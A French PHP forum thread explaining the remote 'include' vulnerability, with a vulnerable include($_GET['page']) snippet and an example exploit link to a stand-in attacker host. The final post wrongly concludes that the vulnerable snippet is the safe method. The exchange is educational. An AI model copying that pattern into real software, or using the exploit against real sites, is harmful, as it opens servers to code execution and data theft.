Discussion :

[adeltimple]

bonjour.
premier message sur ce forum donc je me présente: arnaud 19 ans, bases sup dans le php.
Mon problème du jour: résoudre la faille d'include: en effet sur mon site je met des include pour me connecter à ma base de donnée ect ect les fichiers à protéger se trouvent donc dans un dossier protéger pas mot de passe (htacces ect ect).
Hors en parlant avec une personne qui se débrouille mieux que moi il m'a fait penser au fait que la personne peut en voyant tout simplement mon code utiliser le fichier appelé par un adressage du type http://arnaudinnsert.com/protect/connection.php dans un include

comment résoudre cette faille??
merci de votre aide

[sielfried]

Il marche comment, ton système d'include ?

Suffit de contrôler ce que tu inclus, pour être sûr qu'il s'agisse d'un script destiné à l'être.

[Tsilefy]

Bonsoir,
Comment une personne pourrait-elle voir ton code ?
A moins que tu ne fasses passer le nom et l'adresse de tes pages à inclure directement dans l'url ? Il vaut mieux éviter ce dernier cas, même si, correctement filtré, rien ne passera.

[adeltimple]

merci pour vos réponses .
Alors pour la question de comment on peut voir mon code: il parait que voir du php c'est possible justement en utilisant la même faille.
j'urilise include comme suis dans ma page php (qui n'est pas dans un dossier protéger)

Code :

Sélectionner tout - Visualiser dans une fenêtre à part

1
2
include("secure/connect.php");
include("secure/suis.php");

[Tsilefy]

Une page php n'est normalement pas lisible à partir d'un simple navigateur. Si c'est le cas, ce n'est plus un problème php, c'est une défaillance (grave !) du serveur.
La faille 'include', dans sa version la plus brute (et simplifiée) consiste en ceci :
le lien utilisé pour ouvrir la page :

Code :

Sélectionner tout - Visualiser dans une fenêtre à part

<a href="index.php?page=include.php">

le traitement effectué dans la page index.php

Code :

Sélectionner tout - Visualiser dans une fenêtre à part

1
2
3
4
 
<?php
include($_GET['page']); //affiche la page dans la page en cours
?>

Exploitation de la faille :

Code :

Sélectionner tout - Visualiser dans une fenêtre à part

<a href="index.php?page=http://www.grandmechantpirate.ru/mechant.php">

Conséquence: dès qu'on clique sur le lien, la page http://www.grandmechantpirate.ru/mechant.php est incluse, ce qui permet au grand méchant pirate de faire à peu ce qu'il veut (suivant la configuation de sécurité du serveur), depuis le défaçage de site jusqu'à la lecture du fichier de mots de passe, etc..

La solution consiste simplement à ne jamais faire confiance à tout ce qui provient de l'extérieur, et donc à filtrer soigneusement toute requête GET ou POST, ainsi qu'à ne pas utiliser des indications aussi précises que '?page=' ou 'include=' suivi d'un nom de fichier.

[adeltimple]

OK pour ne pas avoir de problème au niveau sécurité avec mes includes il me suffit donc d'utiliser la deuxième méthode c à d:

Code :

Sélectionner tout - Visualiser dans une fenêtre à part

1
2
3
<?php
include($_GET['page']); //affiche la page dans la page en cours
?>

?
merci de ton aide